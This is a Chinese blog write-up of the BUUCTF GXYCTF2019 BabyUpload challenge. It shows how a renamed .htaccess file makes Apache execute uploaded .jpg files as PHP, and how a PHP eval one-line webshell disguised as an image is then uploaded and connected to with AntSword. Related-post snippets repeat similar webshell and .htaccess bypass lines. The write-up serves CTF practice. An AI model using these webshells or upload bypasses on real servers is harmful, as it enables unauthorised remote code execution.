BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)

最新推荐文章于 2024-04-24 19:08:47 发布
最新推荐文章于 2024-04-24 19:08:47 发布
阅读量1.5k 收藏 9
点赞数 38
分类专栏: CTF做题笔记 文章标签: 网络安全 web安全 linux PHP ctf .htaccess github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73734159/article/details/134688843
版权

题目环境:
image.png
image.png
查看题目源码
image.png

SetHandler application/x-httpd-php
通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性
倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码
这个是需要注意的

.htaccess配置文件特性

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

.htaccess配置文件格式

<FileMatch "xxx.jpg>
SetHandler application/x-httpd-php

创建.htaccess配置文件

SetHandler application/x-httpd-php

Kali创建txt文件输入上面的配置命令,并将其命名为111.jpg文件

image.png
上传.htaccess配置文件
image.png
burp抓包
image.png
image.png

这里猜测.htaccess文件被过滤
所以不能直接上传.htaccess配置文件
先截断数据包再把上传的111.jpg文件更名为.htaccess文件

image.png
右键Repeater
image.png
Send
image.png

上传成功
现在我们的jpg一句话木马文件就可以当作PHP代码来执行了

创建木马文件
<script language='php'>@eval($_REQUEST['shell']);</script>

在Kali里面创建txt文件,输入以上代码,并将其保存命名为flag.jpg

上传木马文件
image.png
image.png

上传成功
访问上传路径链接

http://789b3aeb-6590-4b6a-89bb-17c389233df7.node4.buuoj.cn:81/upload/ff435120073c8f309f3001ca17632671/flag.jpg
image.png

并未呈现图片格式
访问成功

中国蚁剑连接
image.png
image.png

在根目录下发现flag

得到flag:
flag{74de0d6c-9d71-455c-96d3-a264277112c9}

白猫a~
关注
  • 38
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 1890
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 863
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[GXYCTF2019]BabyUpload-BUUTF
最新发布
XiaoYeZhu_1314的博客
04-24 445
他过滤了<?,ph等。
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 703
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3413
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了题目页面的网址 我突然觉得我有希望了! 随后果然发现了题目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1510
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
mac 下 drupal .htaccess配置文件
11-02
mac电脑在xampp环境下搭建drupal使用的.htaccess配置文件,下载后将文件名改为.htaccess放在网站根目录即可。 如果网站不在根目录则放在对应级别的目录下 并修改htaccess文件119行和123行,将119行RewriteBase /...
apache .htaccess文件详解和配置技巧总结
01-10
 .htaccess是一个纯文本文件,它里面存放着Apache服务器配置相关的指令。 .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误...
Apache服务器中.htaccess文件的实用配置示例集锦
09-10
Apache服务器中的`.htaccess`文件是一个非常重要的工具,它允许网站管理员无需直接修改服务器的主配置文件即可控制和定制特定目录的行为。`.htaccess`文件主要用于实现一系列HTTP服务器的指令,如URL重写、访问控制...
21个常用的apache .htaccess文件配置技巧分享
01-10
Apache Web 服务器可以通过 .htaccess 文件来操作各种信息,这是一个目录级配置文件的默认名称,允许去中央化的 Web 服务器配置管理。可用来重写服务器的全局配置。该文件的目的就是为了允许单独目录的访问控制配置...
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1895
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
[HFCTF2020]BabyUpload
nigo134的博客
06-04 975
通过上传session文件伪造session。
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 593
BUUCTF的wp
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 602
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1164
直接开题。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
.htaccess配置索引文件无效
06-11
如果您在使用 `.htaccess` 文件配置索引文件时遇到了问题,可能是由于以下原因: 1. `.htaccess` 文件未被正确启用:请确保您的 Apache 服务器已启用 `.htaccess` 文件。您可以通过在 `.htaccess` 文件中添加任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值